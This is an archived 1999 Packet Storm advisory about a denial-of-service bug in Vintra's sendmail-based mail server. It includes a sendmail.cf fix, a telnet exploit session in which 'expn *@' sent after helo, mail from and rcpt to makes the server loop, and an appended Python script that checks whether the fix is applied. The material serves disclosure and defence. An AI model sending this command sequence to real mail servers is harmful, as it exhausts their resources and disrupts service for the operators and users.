Packet Storm, PACKETSTORM:15344
Aug 17, 1999 - 12:00 a.m.

vintra.txt

`From: Vytis Fedaravicius <[email protected]>  
Subject: DOS in Vintra systems Mailserver software.  
  
Hello,  
  
There is a bug in the free MailServer software for Windows NT from Vintra  
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause the  
MTA to go nuts and drive CPU usage up to 99%, eating all available memory and  
disk space.  
  
Bug: one opens telnet to port 25, issues the helo, mail from: and rcpt to:  
commands, and instead of the data command uses expn *@. The software goes into an  
infinite loop.  
  
Fix: disable the expn command by editing sendmail.cf. Add the following line  
and restart the MTA service.  
  
O PrivacyOptions=needmailhelo, noexpn  
  
  
Exploit (commands to enter are marked ">")  
  
>telnet vulnerable.server.dom 25  
  
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998  
20:18:20 +0200 (Central Europe Daylight Time)  
  
>helo EvilOne  
  
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet  
you  
  
>mail from:bad.boy  
  
250 bad.boy... Sender ok  
  
>rcpt to:resourceLeaker  
  
550 resourceLeaker... User unknown  
  
>expn *@  
  
550 *@... User unknown  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
...hundreds of these lines get logged, memory is allocated, and CPU usage  
increases wildly  
  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
....  
  
This software is sendmail based, so maybe other implementations are  
vulnerable also? Vintra systems were notified.  
  
  
Vytis Fedaravicius  
System administrator  
Omnitel  
  
e-mail: [email protected]  
`
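
To confirm the fix above is actually in effect, the following added example (not part of the original advisory or of Vintra's software) audits sendmail.cf text for the `PrivacyOptions` flags the advisory recommends. The sample fragments are constructed, and treating flags from several option lines as cumulative is an assumption.

```python
import re

# Constructed sendmail.cf fragments for the demo (not taken from a real host).
BEFORE = """\
# EXPN still enabled; the fix is present but commented out
O PrivacyOptions=authwarnings
#O PrivacyOptions=needmailhelo, noexpn
"""
AFTER = """\
# the advisory's fix applied
O PrivacyOptions=needmailhelo, noexpn
"""

# Option lines start at column 0: long form "O PrivacyOptions=..." or the
# short form "Op...". Comment lines (#) and indented lines never match.
_OPTION = re.compile(r"^(?:O\s+(?i:PrivacyOptions)\s*=|Op)(.*)$")

# "goaway" is sendmail's shorthand flag that also switches EXPN off.
EXPN_OFF = {"noexpn", "goaway"}


def privacy_flags(cf_text):
    """Return the lower-cased PrivacyOptions flags set in sendmail.cf text.

    Assumption: flags from several option lines accumulate.
    """
    flags = set()
    for line in cf_text.splitlines():
        m = _OPTION.match(line)
        if m:
            # Flags may be separated by commas and/or spaces, as in the advisory.
            flags.update(f.lower() for f in re.findall(r"[A-Za-z]+", m.group(1)))
    return flags


def audit(cf_text):
    """Return a list of findings; an empty list means the fix is in place."""
    flags = privacy_flags(cf_text)
    findings = []
    if not flags & EXPN_OFF:
        findings.append("EXPN enabled: add noexpn to PrivacyOptions")
    if not flags & {"needmailhelo", "goaway"}:
        findings.append("needmailhelo not set")
    return findings


if __name__ == "__main__":
    for name, text in (("BEFORE", BEFORE), ("AFTER", AFTER)):
        print(name, audit(text) or "ok")
```

A commented-out copy of the fix, as in `BEFORE`, is reported as not applied.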